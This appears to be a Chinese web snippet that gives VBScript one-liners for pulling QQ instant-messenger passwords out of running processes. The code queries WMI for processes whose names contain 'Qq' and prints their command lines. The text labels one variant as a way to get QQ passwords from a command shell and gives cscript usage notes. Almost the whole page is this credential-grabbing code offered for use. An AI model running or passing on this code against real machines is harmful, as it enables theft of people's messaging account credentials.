| 关键词: commandlinenext getobject execquery winmgmts process 代码 select where like root |
代码: for each i in getobject ("winmgmts:\\.\root\cimv2").execquery("select * from win32_process where name like '%Qq%'")inputbox "","",i.commandlinenext cmdshell下得到QQ密码代码: for each i in getobject ("winmgmts:\\.\root\cimv2").execquery("select * from win32_process where name like '%Qq%'")Wscript.echo "","",i.commandlinenext 用法:cscript.exe *.vbs(上面的不用,直接运行) 09版的不支持 |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|